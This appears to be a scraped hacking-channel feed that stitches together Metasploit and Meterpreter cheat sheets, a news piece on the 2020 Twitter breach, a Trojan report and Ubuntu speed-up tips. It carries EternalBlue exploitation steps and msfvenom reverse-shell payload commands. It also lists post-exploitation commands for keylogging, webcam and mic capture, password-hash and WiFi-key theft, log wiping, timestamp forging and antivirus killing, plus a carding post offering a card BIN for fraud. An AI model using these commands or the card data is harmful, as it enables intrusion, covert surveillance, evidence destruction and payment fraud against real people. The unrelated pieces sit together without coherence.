▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑METASPLOIT
#FastTips
Search for exploits using the Metasploit Framework source code on GitHub:
https://github.com/rapid7/metasploit-framework
Translate them for use on OSCP LAB or EXAM.

Metasploit
Metasploit requires PostgreSQL:
systemctl start postgresql
To enable PostgreSQL on startup:
systemctl enable postgresql

MSF Syntax
Start Metasploit:
msfconsole
msfconsole -q
Show help for a command:
show -h
Show auxiliary modules:
show auxiliary
Use a module:
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_pass
Show the basic information for a module:
info
Show the configuration parameters for a module:
show options
Set options for a module:
set RHOSTS 192.168.1.1-254
set THREADS 10
Run the module:
run
Execute an exploit:
exploit
Search for a module:
search type:auxiliary login

Metasploit Database Access
Show all hosts discovered in the MSF database:
hosts
Scan for hosts and store them in the MSF database:
db_nmap
Search machines for specific ports in the MSF database:
services -p 443
Leverage MSF database to scan SMB ports (auto-completed rhosts):
services -p 443 --rhosts

You may find some boxes that are vulnerable to MS17-010 (AKA EternalBlue). Although not officially part of the intended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built-in Metasploit EternalBlue module. I found that the ElevenPaths version works much more reliably. Here are the instructions to install it, taken from the following YouTube video: https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure Kali to work with 32-bit wine
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit
2. Download the exploit repository
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr/share/metasploit-framework/modules/exploits/windows/smb
4. Start the Metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.11.1.73
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run

####Experimenting with Meterpreter####
Get system information from Meterpreter Shell:
sysinfo
Get user id from Meterpreter Shell:
getuid
Search for a file:
search -f *pass*.txt
Upload a file:
upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
Download a file:
download c:\\Windows\\system32\\calc.exe /tmp/calc.exe
Invoke a command shell from Meterpreter Shell:
shell
Exit the Meterpreter shell:
exit

Metasploit Exploit Multi Handler
multi/handler to accept an incoming reverse_https_meterpreter payload:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/

Building Your Own MSF Module
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp /usr/share/metasploit-framework/modules/exploits/linux/misc/gld_postfix.rb ./crossfire.rb
nano crossfire.rb

Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Capabilities)
download        Download a file or directory
upload          Upload a file or directory
portfwd         Forward a local port to a remote service
route           View and modify the routing table
keyscan_start   Start capturing keystrokes
keyscan_stop    Stop capturing keystrokes
screenshot      Grab a screenshot of the interactive desktop
record_mic      Record audio from the default microphone for X seconds
webcam_snap     Take a snapshot from the specified webcam
getsystem       Attempt to elevate your privilege to that of local system.
hashdump        Dumps the contents of the SAM database
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑FOR BEGINNERS :
+ Creating Metasploit Payloads
List payloads
msfvenom -l

Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Shellcode
For all shellcode, see 'msfvenom --help-formats' for the valid format parameters. Msfvenom outputs code in the chosen language that can be cut and pasted into your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Handlers
Metasploit handlers are a quick way to set Metasploit up to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Meterpreter Study Notes
# Basic system commands
background # Put the current session in the background
sessions # List sessions; -h shows help
sessions -i <ID value> # Enter the session with that ID; -k kills a session
bgrun / run # Execute an existing module or script; type run and press Tab twice to list the available scripts
info # View existing module information
getuid # View current user identity
getprivs # View current user permissions
getpid # Get current process ID (PID)
sysinfo # View target machine system information
irb # Open ruby terminal
ps # View running processes
kill <PID value> # Kill the specified PID process
idletime # View target idle time
reboot / shutdown # Restart / Shutdown
shell # Enter target cmd shell
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Bypassing Application Whitelisting By Using dnx.exe.pdf
226.5 KB
The Most requested hacking tutorial :
Bypassing Application Whitelisting By Using dnx.exe
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Helpful Commands for any hacker:
# uictl: switch keyboard / mouse
uictl [enable/disable] [keyboard/mouse/all] # Enable or disable keyboard/mouse
uictl disable mouse # Disable mouse
uictl disable keyboard # Disable keyboard
# execute: run an executable file
execute # Run an executable file on the target machine
execute -H -i -f cmd.exe # Create a new cmd.exe process; -H hidden, -i interactive
execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt"
# -d Process name displayed on the target host during execution (for masquerading); -m Direct execution from memory
# -a "-o hack.txt" passes "-o hack.txt" as the run-time argument of payload.exe
# migrate: process migration
getpid # Get the current process's PID
ps # View the currently active processes
migrate <pid value> # Migrate the Meterpreter session into the process with the specified PID
kill <pid value> # Kill the process
# clearev: clear logs
clearev # Clear the application, system and security logs in Windows
# timestomp: forge timestamps
timestomp C:\\ -h # View help
timestomp -v C:\\2.txt # View timestamp
timestomp C:\\2.txt -f C:\\1.txt # Copy the timestamp of 1.txt to 2.txt
timestomp c:\\test\\22.txt -z "03/10/2019 11:55:55" -v # Set the four properties to a uniform time
# portfwd: port forwarding
portfwd add -l 1111 -p 3389 -r 127.0.0.1 # Forward port 3389 of the target machine to local port 1111
rdesktop 127.0.0.1:1111 # Need to enter the username and password to connect
rdesktop -u Administrator -p 123 127.0.0.1:1111 # -u username -p password
# autoroute: add a route
run autoroute -h # View help
run get_local_subnets # View the target's internal network segments
run autoroute -s 192.168.183.0/24 # Add a route to the target network segment
run autoroute -p # View added routes
run post/windows/gather/arp_scanner RHOSTS=192.168.183.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.183.146 PORTS=3389
# SOCKS proxy
Reference: https://www.freebuf.com/articles/network/125278.html
use auxiliary/server/socks4a
set srvhost 127.0.0.1
set srvport 2000
run
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑# Common scripts :
run arp_scanner -r 192.168.183.1/24 # Use ARP to scan for live hosts
run winenum # Automate some detection scripts
run credcollect # Get user hashes
run domain_list_gen # Get the list of domain admin accounts
run post/multi/gather/env # Get user environment variables
run post/windows/gather/enum_logged_on_users -c # List currently logged-on users
run post/linux/gather/checkvm # Check for a virtual machine
run post/windows/gather/checkvm # Check for a virtual machine
run post/windows/gather/forensics/enum_drives # View storage (drive) information
run post/windows/gather/enum_applications # Get installed software information
run post/windows/gather/dumplinks # Get recently accessed documents, link information
run post/windows/gather/enum_ie # Get IE cache
run post/windows/gather/enum_firefox # Get Firefox cache
run post/windows/gather/enum_chrome # Get Chrome cache
run post/multi/recon/local_exploit_suggester # Get local privilege vulnerabilities
run post/windows/gather/enum_patches # Get patch information
run post/windows/gather/enum_domain # Find the domain controller
run post/windows/gather/enum_snmp # Get SNMP community name
run post/windows/gather/credentials/vnc # Get VNC password
run post/windows/wlan/wlan_profile # Used to read the target host's WiFi password
run post/multi/gather/wlan_geolocate # WLAN-based geolocation; the result file is located at /root/.msf4/loot
run post/windows/manage/killav # Close antivirus software
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Crack-Sniffer-Keylogger-webcam modules :
# Common crack modules
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/telnet/telnet_login
auxiliary/scanner/smb/smb_login
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/postgres/postgres_login
auxiliary/scanner/vnc/vnc_login
auxiliary/scanner/pcanywhere/pcanywhere_login
auxiliary/scanner/snmp/snmp_login
auxiliary/scanner/ftp/anonymous
# Keylogger
keyscan_start # Start key recording
keyscan_dump # Export recorded data
keyscan_stop # End key recording
# Sniffer packet capture
use sniffer
sniffer_interfaces # View NICs
sniffer_start 1 # Select NIC 1 to start capturing
sniffer_stats 1 # View NIC 1 status
sniffer_dump 1 /tmp/wlan1.pcap # Export pcap packets
sniffer_stop 1 # Stop NIC 1 capture
sniffer_release 1 # Release NIC 1 traffic
# Webcam
record_mic # Audio recording
webcam_chat # Open a video chat (a window pops up on the other party's side)
webcam_list # View cameras
webcam_snap # Take a picture through the camera
webcam_stream # Open a video stream from the camera (viewed as a near-live web page)
# Screen capture
screenshot # Screenshot
use espia # Use espia module
screengrab # Screenshot
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑The latest variant of the eternal blue downloader restarts the EXE file attack, and the new variant has infected 15,000 servers :
> A new variant of the eternal blue downloader Trojan. This variant uses Python to package EXE executable files for attacks. The organization used a similar method at the end of 2018. Tencent security big data monitoring data shows that the latest variant of the eternal blue downloader quickly spread after it appeared. It has infected about 15,000 servers. The poisoning system is finally used to download and run the Monero mining Trojan.
> In the process of continuous evolution and update, the eternal blue downloader Trojan has gradually switched the EXE attack mode to use Powershell scripts to achieve fileless attacks. After its functions became more and more huge, the gang of gangsters again added the code of exploiting the eternal blue vulnerability attack and mssql blasting attack to the EXE Trojan, and shielded the relevant code in Powershell.
> The system trapped by this variant attack will download if.bin, download and run an EXE attack module named by a random string for large-scale vulnerability scanning and attack propagation, and will also download the Monero coin mining Trojan to occupy a large amount of CPU resources on the server. Mining will cause severe productivity losses to the injured enterprises.
enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Best Boot - Repair access to operating systems
GRUB reinstall, MBR restore, UEFI, SecureBoot, RAID, LVM, Wubi, filesystem repair... :
Download : https://sourceforge.net/p/boot-repair/home
#FastTips
GitHub Enterprise Remote Code Execution.pdf
208 KB
GitHub Enterprise Remote Code Execution
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑What network tools should you choose?
#FastTips
> The most advanced network monitoring tools can also perform the following 5 functions :
1. Network and application monitoring
2. Network problem analysis
3. Application data and stream interception analysis
4. Virtualization and operating system problem detection
5. Root cause analysis
Different network performance monitoring vendors have different granularities in performing these tasks. Moreover, the more precise the task, the more complicated it will be when it is implemented and managed. Therefore, we must accurately understand the needs of our organization, and then properly balance the granularity and complexity.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
BIN Multifunctional:(PUBG)
BIN: 431732027035xxxx
DATE: 02/23
CVV: RANDOM
IP: USA 🇺🇸
Working For :
Pubg Uc
Prime Video
PlayStore
Spotify (Paid & Auto Renew)
Netflix
Ding (Charged Card Needed)
Note: Lives CVV Needed.
- Working on more Sites.
(Only verified, not created by us)
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑We all know what happened to Twitter, but here are the real details:
#news
Twitter mass hacking may evolve into a global security crisis
Sina Technology News, July 16 (Beijing time): according to foreign media reports, the Bitcoin scammers will not be the last people to hijack verified accounts. We should be vigilant, because others will try to steal our accounts.
All of this was to be expected.
The hacker attack on July 15, 2020 is the worst security breach in Twitter's history. No matter how the company ultimately tells the story, one thing must be acknowledged: the crisis had been brewing for several years.
Since the spring of 2018, scammers have been posing as Elon Musk, a well-known cryptocurrency enthusiast. They use Musk's avatar, choose a similar username, and then post an offer that looks like pie in the sky: lend him some cryptocurrency and he will give you back more. Sometimes scammers reply to a related verified account (such as Musk's SpaceX) to make the fake account look more real. Scammers also spread the fake tweets through botnets, again to make them look authentic.
The events of 2018 showed us three things. First, there are always people who are deceived, and every success is enough to inspire further fraud. Second, Twitter was slow to handle this threat, falling far short of the company's early promise to take these issues seriously. Third, the scammers' needs and Twitter's initial countermeasures turned into a cat-and-mouse game, which in turn pushed the criminals toward more aggressive and more damaging actions.
That brings us to today's attack, the largest so far. Nick Statt reports:
“Large companies and individuals’ Twitter accounts have recently encountered the largest hacker attack on the platform ever. All attacks are aimed at promoting bitcoin scams, and the initiators seem to have earned a small amount of money from them. We don’t know how the attack happened, and we don’t know how much damage was done to Twitter’s own system. The hackers seem to have stopped, but the authentication account has been posting new scam tweets from 4 pm Eastern time, which has lasted for more than two hours. It has been silent for more than one hour. At last, Twitter finally admitted the time of the hacker attack. At 5:45 ET, it wrote on the company's user support account: 'We have been informed of the security incidents affecting users of our platform. We are investigating and actively taking measures to respond to the attack. We will provide you with the latest information as soon as possible.'”
The verified accounts of former President Barack Obama, Joe Biden, Amazon CEO Jeff Bezos, Bill Gates and pop singer Kanye West, among others, as well as those of Apple, Uber and other technology companies, were hacked.
But those all came later. Who was the first celebrity account to be attacked? Elon Musk, no doubt.
In the first few hours of the hack, the victims sent more than 118,000 dollars to the hackers. In addition, the hackers may also have accessed a large number of personal direct messages. Even more disturbing are the speed and scale of the attack, as well as the deeper national security issues.
Of course, the most important and most obvious question is who launched the attack and how they did it. As of press time, we have no answer. According to a report by security reporter Joseph Cox, screenshots shared among members of the underground hacker community show that someone had access to the tools used to manage accounts inside Twitter. Cox wrote:
"Two sources of the underground hacker community provided a screenshot of an internal control panel to the media. It is alleged that Twitter employees use this internal control panel to manage user accounts. A source said that this control panel of Twitter is also used to change the ownership of certain so-called OG accounts. Twitter has deleted screenshots of these control panels and suspended the user accounts that posted these screenshots, saying the content violates community rules."
Further speculation would inevitably look irresponsible, but Cox’s report at least indicates that this is not a simple, ordinary hacking incident. One possibility is that a hacker broke into Twitter’s internal tools. Cox also raised another possibility: an insider among Twitter's employees took part in the attack. If that is the case, then Twitter has really hit the lottery this year. Twice.
In either case, Twitter’s response to this incident has caused further confusion. The company’s earliest tweet about the matter contained basically nothing of substance. Two hours later, Twitter simply stated that it had disabled tweeting for verified accounts, or had reset their passwords, while it tried to investigate the root cause of the attack. But before Twitter had explained the situation, many users had already found out the hard way that they couldn't tweet.
Politicians, celebrities and national news media being unable to tweet at least saved Twitter some public relations trouble. Ordinary users found this amusing, but think about the more serious problems. Twitter, for better or worse, is one of the most important communication systems in the world. Many of its users are related to emergency medical services. For example, the National Weather Service of Lincoln, Illinois had just issued a tornado warning before verified accounts were blocked. Those who rely on this account to follow the tornado's progress may have been out of luck.
Of course, Twitter's ban on posting from verified accounts was also a last resort. People would probably rather have the National Weather Service unable to tweet than have hackers sell its account to criminals, who could then log in and post false information, such as falsely claiming that tornadoes had swept the major cities of the United States. But solving the problem with such a clumsy method, prohibiting most of the 359,000 verified accounts from publishing messages, reflects the wide scope of the incident.
Then you can't help but wonder what emergency measures the company will take if next time it is not a greedy bitcoin scammer but a nation-state actor or a mentally unstable person. After this incident, it is not difficult to imagine someone taking control of a world leader's account and then attempting to start a nuclear war.
On this point, what Senator Josh Hawley, Republican of Missouri, wrote in his letter to Twitter CEO Jack Dorsey resonates strongly. Hawley said:
"I am concerned that this incident is not just a series of planned and premeditated independent hacker attacks, but also a successful attack on Twitter's own security. As you know, your millions of users not only rely on your service for publicly released Tweets, but also use your direct messaging service to communicate with each other in private. Successful attacks on your system's servers will pose a threat to the privacy and data security of all users."
However, Hawley did not cover everything. It is not only user privacy and data security that are threatened here. More importantly, impersonation and fraud on Twitter are very likely to cause turmoil in the real world. We have now seen this hypothetical actually happen. With less than four months left before the 2020 election, God knows exactly what will happen.
In the next few days, Twitter may investigate the cause of the security incident. The company may not be able to give a completely satisfactory explanation. But the important thing is that Twitter shares with the public, in a timely manner, what it has learned about the incident and what measures the company will take in the future to prevent such a thing from happening again. (noob)
@▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑SPEEDUP ANY LINUX - WIKI SOURCES:
1. Reduce the default grub load time:
Grub gives you 10 seconds to switch between dual-boot operating systems or to go into recovery. To me, that is too much. It also means you have to sit beside your computer and press the Enter key to boot into Ubuntu as soon as possible. A little time-consuming, isn't it? The first trick is to shorten this boot delay. If you are more comfortable with a GUI tool, read this article to change grub time and boot order with Grub Customizer.
For the rest of us, you can simply use the following command to open the grub configuration:
sudo gedit /etc/default/grub &
And change GRUB_TIMEOUT=10 to GRUB_TIMEOUT=2. This changes the boot menu delay to 2 seconds. Avoid putting 0 here, as you will lose the ability to choose between operating systems and recovery options. Once you have changed the grub configuration, update grub to make the change take effect:
sudo update-grub
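The edit from tip 1 can also be made without opening an editor. The script below is an added example, not part of the original article: set_grub_timeout and get_grub_timeout are hypothetical helper names, and the demo runs on a constructed sample file rather than the real /etc/default/grub.

```shell
#!/bin/sh
# Added example: change GRUB_TIMEOUT in a grub defaults file non-interactively.
# Helper names are hypothetical; they are not part of GRUB or Ubuntu.

# set_grub_timeout FILE SECONDS
# Rewrites (or appends) the GRUB_TIMEOUT= line, keeping a backup in FILE.bak.
set_grub_timeout() {
    file=$1
    seconds=$2

    # Accept only digits, so nothing unexpected reaches the sed expression.
    case $seconds in
        ''|*[!0-9]*)
            echo "timeout must be a whole number of seconds" >&2
            return 2 ;;
    esac
    # Follow the article's advice: 0 removes the chance to pick recovery.
    if [ "$seconds" -lt 1 ]; then
        echo "refusing GRUB_TIMEOUT=0: boot menu would be skipped" >&2
        return 2
    fi
    [ -f "$file" ] || { echo "no such file: $file" >&2; return 1; }

    # Keep the previous version so a bad edit can be rolled back.
    cp -p "$file" "$file.bak" || return 1

    tmp=$(mktemp) || return 1
    if grep -q '^GRUB_TIMEOUT=' "$file"; then
        # The trailing '=' keeps GRUB_TIMEOUT_STYLE= and similar keys untouched.
        sed "s/^GRUB_TIMEOUT=.*/GRUB_TIMEOUT=$seconds/" "$file" > "$tmp"
    else
        cat "$file" > "$tmp"
        printf 'GRUB_TIMEOUT=%s\n' "$seconds" >> "$tmp"
    fi
    # Write back through the existing file so owner and mode stay the same.
    cat "$tmp" > "$file"
    status=$?
    rm -f "$tmp"
    return $status
}

# get_grub_timeout FILE
# Prints the effective GRUB_TIMEOUT value (the last assignment wins).
get_grub_timeout() {
    sed -n 's/^GRUB_TIMEOUT=//p' "$1" | tail -n 1
}

# Demo on a constructed sample, not the live configuration.
demo_file=$(mktemp)
cat > "$demo_file" <<'EOF'
GRUB_DEFAULT=0
GRUB_TIMEOUT_STYLE=hidden
GRUB_TIMEOUT=10
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"
EOF
set_grub_timeout "$demo_file" 2
echo "sample file now has GRUB_TIMEOUT=$(get_grub_timeout "$demo_file")"
rm -f "$demo_file" "$demo_file.bak"
```

On a real system the function would be run with root privileges against /etc/default/grub, followed by the sudo update-grub step shown above.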
2. Manage startup applications:
Over time you tend to install more and more applications. If you are a regular It’s FOSS reader, you might have installed many apps from the App of the week series.
Some of these apps start at every boot, and of course resources are kept busy running them. Result: a slow computer for a significant time at each boot. Go to Unity Dash and look for Startup Applications.
There, look at which applications are loaded at startup. Now think about whether there are any applications you don’t need started every time you boot into Ubuntu. Feel free to remove them.
But what if you don’t want to remove the applications from startup? For example, if you installed one of the best indicator applets for Ubuntu, you will want it to start automatically at each boot.
What you can do here is delay the start of some of the programs. This way you free up resources at boot time and your applications still start automatically, after some time. In the Startup Applications window, click Edit and change the run command with a sleep option.
For example, if you want to delay the Dropbox indicator by, let’s say, 20 seconds, you just need to add a command like this in front of the existing command:
sleep 20;
So, the command ‘dropbox start -i’ changes to ‘sleep 20; dropbox start -i’. This means Dropbox will now start with a 20-second delay. You can change the start time of other startup applications in a similar fashion.
3. Install preload to speed up application load time:
Preload is a daemon that runs in the background and analyzes user behavior and frequently run applications. Open a terminal and use the following command to install preload:
sudo apt-get install preload
After installing it, restart your computer and forget about it. It will be working in the background. Read more about preload.
4. Choose the best mirror for software updates:
It’s good to verify that you are using the best mirror to update the software. Ubuntu software repositories are mirrored across the globe, and it is advisable to use the one nearest to you. This results in quicker system updates, as it reduces the time needed to get the packages from the server.
In Software & Updates->Ubuntu Software tab->Download From, choose Other and then click on Select Best Server.
It will run a test and tell you which is the best mirror for you. Normally, the best mirror is already set but, as I said, there is no harm in verifying it. Also, this may result in some delay in getting the updates if the nearest mirror where the repository is cached is not updated frequently. This is useful for people with a relatively slow internet connection. You can also use these tips to speed up wifi in Ubuntu.
5. Use apt-fast instead of apt-get for a speedy update:
apt-fast is a shell script wrapper for “apt-get” that improves update and package download speed by downloading packages over multiple connections simultaneously. If you frequently use the terminal and apt-get to install and update packages, you may want to give apt-fast a try. Install apt-fast via the official PPA using the following commands:
sudo add-apt-repository ppa:apt-fast/stable
sudo apt-get update
sudo apt-get install apt-fast
6. Remove language related ign from apt-get update:
Have you ever noticed the output of sudo apt-get update? There are three kinds of lines in it: hit, ign and get. You can read their meaning here. If you look at the IGN lines, you will find that most of them are related to language translation. If you use all your applications and packages in English, there is absolutely no need for a translation of the package database from English to English.
If you suppress these language-related updates in apt-get, it will slightly increase the apt-get update speed. To do that, open the following file:
sudo gedit /etc/apt/apt.conf.d/00aptitude
And add the following line at the end of this file:
Acquire::Languages "none";
7. Reduce overheating:
Overheating is a common problem in computers these days. An overheated computer runs quite slow. It takes ages to open a program when your CPU fan is running like Usain Bolt. There are two tools which you can use to reduce overheating and thus get a better system performance in Ubuntu, TLP and CPUFREQ.
To install and use TLP, use the following commands in a terminal:
sudo add-apt-repository ppa:linrunner/tlp
sudo apt-get update
sudo apt-get install tlp tlp-rdw
sudo tlp start
You don’t need to do anything after installing TLP. It works in the background.
To install CPUFREQ indicator use the following command:
sudo apt-get install indicator-cpufreq
Restart your computer and use the Powersave mode in it:
8. Tweak LibreOffice to make it faster:
If you are a frequent user of office products, you may want to tweak the default LibreOffice a bit to make it faster. You will be tweaking the memory options here. Open LibreOffice and go to Tools->Options. There, choose Memory from the left sidebar, enable Systray Quickstarter and increase the memory allocation.
You can read more about how to speed up LibreOffice in detail.
9. Use a lightweight desktop environment (if you can)
If you chose to install the default Unity or GNOME desktop environment, you may opt for a lightweight desktop environment like Xfce or LXDE instead.
These desktop environments use less RAM and consume less CPU. They also come with their own set of lightweight applications that further helps in running Ubuntu faster. You can refer to this detailed guide to learn how to install Xfce on Ubuntu.
Of course, the desktop might not look as modern as Unity or GNOME. That’s a compromise you have to make.
10. Use lighter alternatives for different applications:
This is more of a suggestion and liking. Some of the default or popular applications are resource heavy and may not be suitable for a low-end computer. What you can do is to use some alternates to these applications. For example, use AppGrid instead of Ubuntu Software Center. Use Gdebi to install packages. Use AbiWord instead of LibreOffice Writer etc.
That concludes the collection of tips to make Ubuntu 18.04, 16.04 and other versions faster. I am sure these tips would provide overall a better system performance.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁